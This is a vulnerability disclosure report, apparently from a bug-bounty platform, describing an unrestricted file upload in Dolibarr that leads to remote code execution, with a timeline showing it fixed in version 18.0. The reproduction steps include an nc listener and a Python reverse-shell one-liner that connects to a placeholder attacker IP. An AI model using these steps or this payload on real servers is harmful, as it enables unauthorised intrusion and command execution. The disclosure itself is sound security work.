Unresitricted File Upload leads to Remote Code Execution in dolibarr/dolibarr

Valid

Reported on

Feb 17th 2023


Description

Due to improper validation of upload filename allows authenticated attacker to upload file without extension. In combine with "Export" feature, attacker can successfully execute arbitrary command on the target webserver

Step to Reproduce

On attacker machine, start a listener on port 4444

nc -lvnp 4444

Manual

Change the value of UMask parameter for new files on Unix/Linux/BSD/Mac file system. ("/admin/security_file.php" endpoind) to 0777 image Prepare a file named mysqldump or anything defined in $dolibarr_main_restrict_os_commands (get it in /admin/system/security.php endpoint) with the reverse shell payload (or any payload), example:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ATTACKER-IP}",{ATTACKER-PORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Using Form to test file upload in /admin/security_file.php, to upload that file. The file will be stored in {Data files directory}/admin/temp/{FILE_NAME} image Using "Export" feature (/admin/tools/dolibarr_export.php endpoint) and set the value of Full path to mysqldump command to {Data files directory}/admin/temp/{FILE_NAME} and then click on "Generate Backup" image On attacker terminal, we will receive a connect back from target webserver image

Automation Tool

Use the exploit code and execute the following command (this exploit use mysqldump as a uploaded filename)

python3 exploit.py -t "{TARGET-WEBSERVER}" -u {USERNAME} -p {PASSWORD} -lhost {ATTACKER-LISTENING-IP} -lport {ATTACKER-LISTENING-PORT}

Proof of Concept

Impact

By exploiting this vulnerability, authenticated attacker can execute arbitrary command on the target server

We are processing your report and will contact the dolibarr team within 24 hours. a year ago
blakduk modified the report
a year ago
We have contacted a member of the dolibarr team and are waiting to hear back a year ago
Laurent Destailleur validated this vulnerability a year ago
blakduk has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Laurent Destailleur marked this as fixed in 18.0 with commit 27279a a year ago
Laurent Destailleur has been awarded the fix bounty
This vulnerability has now been published 24 days ago
to join this conversation